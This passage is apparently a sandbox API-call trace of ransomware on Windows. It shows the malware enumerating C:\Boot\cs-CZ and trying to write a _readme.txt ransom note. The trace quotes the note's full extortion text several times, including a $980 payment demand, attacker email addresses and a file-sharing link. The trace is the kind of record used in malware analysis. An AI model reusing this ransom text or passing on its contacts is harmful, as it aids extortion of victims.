HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.465] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.465] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.465] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.465] PathFindFileNameW (pszPath="") returned="" [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.465] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.466] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.466] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.466] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.466] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0228.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.466] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0228.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.468] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.468] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.468] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.469] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.469] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.469] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.469] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.469] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.469] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 